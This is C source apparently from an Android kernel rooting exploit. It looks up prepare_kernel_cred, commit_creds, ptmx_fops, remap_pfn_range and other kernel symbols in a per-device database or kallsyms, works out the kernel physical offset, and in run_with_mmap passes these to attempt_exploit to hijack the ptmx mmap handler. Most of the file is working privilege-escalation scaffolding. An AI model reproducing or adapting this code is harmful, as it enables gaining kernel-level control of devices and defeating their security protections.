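/*
 * True when the cached mmc_protect parameters describe a layout this code
 * knows how to handle: a non-zero mmc_protect_part address together with one
 * of the three recognised part types. Any other combination is treated as
 * unsupported.
 */
static bool mmc_protect_params_supported(void)
{
    if (!mmc_protect_part) {
        return false;
    }
    return mmc_protect_part_type == MMC_PROTECT_PART_TYPE1
        || mmc_protect_part_type == MMC_PROTECT_PART_TYPE2
        || mmc_protect_part_type == MMC_PROTECT_PART_TYPE3;
}

/*
 * Populate mmc_protect_part and mmc_protect_part_type from the device
 * database.
 *
 * If the part address is not recorded, detect_mmc_protect() is run once and
 * the lookup is retried (detect_mmc_protect() presumably registers the symbol;
 * verify there). Already-resolved, supported values are returned without
 * touching the database.
 *
 * Returns true when both values are usable; otherwise resets them to
 * 0 / MMC_PROTECT_PART_TYPE_UNKNOWN so later callers never see a
 * half-initialised pair, and returns false.
 */
static bool setup_param_from_database(void)
{
    /* Fast path: a previous call already resolved a supported pair. */
    if (mmc_protect_params_supported()) {
        return true;
    }

    mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part));
    if (!mmc_protect_part) {
        detect_mmc_protect();
        mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part));
    }
    mmc_protect_part_type = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect.part_type));

    if (mmc_protect_params_supported()) {
        return true;
    }

    /* Unsupported or unknown: clear both so no stale value leaks out. */
    mmc_protect_part = 0;
    mmc_protect_part_type = MMC_PROTECT_PART_TYPE_UNKNOWN;
    return false;
}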
/*
 * Look up prepare_kernel_cred and commit_creds in the device database.
 *
 * Both out-parameters are always written (each receives the raw lookup
 * result, NULL when the symbol is unknown). Returns true only when both are
 * non-NULL; otherwise the "device not supported" explanation is printed and
 * false is returned.
 */
static bool get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address)
{
    void *prepare = (void *)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred));
    void *commit = (void *)device_get_symbol_address(DEVICE_SYMBOL(commit_creds));

    *prepare_kernel_cred_address = prepare;
    *commit_creds_address = commit;

    if (prepare == NULL || commit == NULL) {
        print_reason_device_not_supported();
        return false;
    }
    return true;
}
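/*
 * Record @address as the value of @symbol for the current device.
 *
 * @symbol   symbol name; it is bound as a text parameter, never spliced into
 *           the SQL string.
 * @address  kernel address to record; 0 is rejected.
 *
 * Returns true when the address is recorded afterwards (including the case
 * where the same address was already present). Returns false for address 0,
 * for a conflicting existing entry (reported on stdout, nothing overwritten),
 * or on any SQLite error (sqlite3_errmsg() is printed).
 *
 * Fixes relative to the earlier version: the duplicate-symbol message used
 * "%08x" for unsigned long arguments (undefined behaviour, wrong on LP64),
 * the formatted address buffer was bound with SQLITE_STATIC but went out of
 * scope before execute_sql() read it, and the snprintf() result was not
 * checked before being used as a length.
 */
bool device_set_symbol_address(device_symbol_t symbol, unsigned long int address)
{
    if (address == 0) {
        return false;
    }

    unsigned long int old = device_get_symbol_address(symbol);
    if (old == address) {
        return true;
    }
    if (old) {
        printf("Duplicate symbol \"%s\": old = 0x%08lx, new = 0x%08lx\n", symbol, old, address);
        return false;
    }

    /* "0x" + up to 16 hex digits + NUL fits in 20 bytes. Kept at function
     * scope: it is bound with SQLITE_STATIC, so it must outlive execute_sql(). */
    char hex_address[20] = { 0 };
    int length = snprintf(hex_address, sizeof(hex_address), "0x%08lx", address);
    if (length < 0 || (size_t)length >= sizeof(hex_address)) {
        printf("Failed to format address 0x%08lx\n", address);
        return false;
    }

    device_id_t device_id = get_device_id(true);
    sqlite3_stmt *st = NULL;
    int rc = sqlite3_prepare(db, SQL_REGISTER_DEVICE_ADDRESS, -1, &st, NULL);
    if (!IS_SQL_ERROR(rc)) {
        rc = sqlite3_reset(st);
    }
    if (!IS_SQL_ERROR(rc)) {
        rc = sqlite3_bind_int(st, 1, device_id);
    }
    if (!IS_SQL_ERROR(rc)) {
        rc = sqlite3_bind_text(st, 2, symbol, -1, SQLITE_STATIC);
    }
    if (!IS_SQL_ERROR(rc)) {
        rc = sqlite3_bind_text(st, 3, hex_address, length, SQLITE_STATIC);
    }
    if (!IS_SQL_ERROR(rc)) {
        rc = execute_sql(st);
    }

    bool ok = !IS_SQL_ERROR(rc);
    if (!ok) {
        /* Read the error before finalize, which may reset it. */
        printf("%s(%d)\n", sqlite3_errmsg(db), sqlite3_errcode(db));
    }
    /* sqlite3_finalize(NULL) is a harmless no-op if prepare failed. */
    sqlite3_finalize(st);
    return ok;
}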
/*
 * Fetch the delayed_rsp_id address from the device database.
 *
 * Returns the address as a pointer, or NULL after printing the
 * "device not supported" explanation when the symbol is unknown.
 */
static void *get_delayed_rsp_id_addresses(void)
{
    void *address = (void *)device_get_symbol_address(DEVICE_SYMBOL(delayed_rsp_id));
    if (address == NULL) {
        print_reason_device_not_supported();
    }
    return address;
}
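/*
 * Resolve remap_pfn_range: the device database first, then kallsyms when it
 * is available. Idempotent; a value already set is kept untouched.
 *
 * Returns true if remap_pfn_range is non-zero afterwards.
 *
 * The kallsyms result is now cast to (void *) like in
 * setup_vmalloc_exec_address(); elsewhere in this file
 * kallsyms_get_symbol_address() is stored into an unsigned long, so the
 * uncast assignment was an integer-to-pointer conversion.
 */
bool setup_remap_pfn_range_address(void)
{
    if (remap_pfn_range) {
        return true;
    }
    remap_pfn_range = (void *)device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range));
    if (!remap_pfn_range && kallsyms_exist()) {
        remap_pfn_range = (void *)kallsyms_get_symbol_address("remap_pfn_range");
    }
    return remap_pfn_range != 0;
}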
/*
 * Resolve vmalloc_exec: the device database first, then kallsyms when it is
 * available. Neither lookup runs if the value is already set.
 *
 * Returns true if vmalloc_exec is non-zero afterwards.
 */
bool setup_vmalloc_exec_address(void)
{
    if (!vmalloc_exec) {
        vmalloc_exec = (void *)device_get_symbol_address(DEVICE_SYMBOL(vmalloc_exec));
    }
    if (!vmalloc_exec && kallsyms_exist()) {
        vmalloc_exec = (void *)kallsyms_get_symbol_address("vmalloc_exec");
    }
    return vmalloc_exec != 0;
}
/*
 * Return the kernel physical offset, trying in order: the device database,
 * find_kernel_text_from_iomem(), and finally default_kernel_physical_offset.
 * A zero result from a source means "unknown" and falls through to the next.
 */
static unsigned long int get_kernel_physical_offset(void)
{
    unsigned long int from_db = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
    if (from_db) {
        return from_db;
    }

    unsigned long int from_iomem = find_kernel_text_from_iomem();
    if (from_iomem) {
        return from_iomem;
    }

    return default_kernel_physical_offset;
}
/*
 * Return the ptmx_fops address from the device database, falling back to
 * kallsyms when the database has no entry and kallsyms is available.
 * Returns 0 when neither source knows the symbol.
 */
static unsigned long int get_ptmx_fops_address(void)
{
    unsigned long int address = device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops));
    if (!address && kallsyms_exist()) {
        address = kallsyms_get_symbol_address("ptmx_fops");
    }
    return address;
}
/*
 * Fill in the file-scope kernel_physical_offset, trying in order: the device
 * database, find_kernel_text_from_iomem(), find_kernel_text_from_config().
 *
 * Returns true once a non-zero value is found. If every source yields 0 the
 * "device not supported" explanation is printed and false is returned
 * (kernel_physical_offset is then 0).
 */
static bool setup_variables(void)
{
    kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
    if (!kernel_physical_offset) {
        kernel_physical_offset = find_kernel_text_from_iomem();
    }
    if (!kernel_physical_offset) {
        kernel_physical_offset = find_kernel_text_from_config();
    }
    if (!kernel_physical_offset) {
        print_reason_device_not_supported();
        return false;
    }
    return true;
}
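/*
 * Amount subtracted from the database's kernel_physical_offset (the kernel
 * text address) before it is passed to set_kernel_phys_offset(). 0x8000 is
 * the usual ARM TEXT_OFFSET, but confirm against what
 * set_kernel_phys_offset() actually expects.
 */
enum { KERNEL_TEXT_TO_PHYS_BASE_DELTA = 0x00008000 };

/*
 * Run @callback through the mmap-based path.
 *
 * run_exploit_mmap() is tried first; if it reports that it handled the call,
 * its result is returned as-is. Otherwise the prerequisites are resolved in
 * turn -- remap_pfn_range, ptmx_fops_mmap_address and the kernel physical
 * offset (database value, else detect_kernel_phys_parameters()) -- and a
 * message naming the missing item is printed and false returned on the
 * first failure. With everything present the result of attempt_exploit()
 * is returned.
 *
 * The local that used to shadow the file-scope kernel_physical_offset
 * (assigned in setup_variables()) has been renamed.
 */
bool run_with_mmap(memory_callback_t callback)
{
    bool result;
    if (run_exploit_mmap(callback, &result)) {
        return result;
    }

    setup_remap_pfn_range_address();
    if (!remap_pfn_range) {
        printf("You need to manage to get remap_pfn_range addresses.\n");
        return false;
    }

    setup_ptmx_fops_mmap_address();
    if (!ptmx_fops_mmap_address) {
        printf("You need to manage to get ptmx_fops addresses.\n");
        return false;
    }

    unsigned long int db_kernel_physical_offset =
        device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
    if (db_kernel_physical_offset) {
        set_kernel_phys_offset(db_kernel_physical_offset - KERNEL_TEXT_TO_PHYS_BASE_DELTA);
    } else if (!detect_kernel_phys_parameters()) {
        printf("You need to manage to get kernel_physical_offset addresses.\n");
        return false;
    }

    return attempt_exploit(ptmx_fops_mmap_address, (unsigned long int)&ptmx_mmap, 0,
                           run_callback_with_mmap, callback);
}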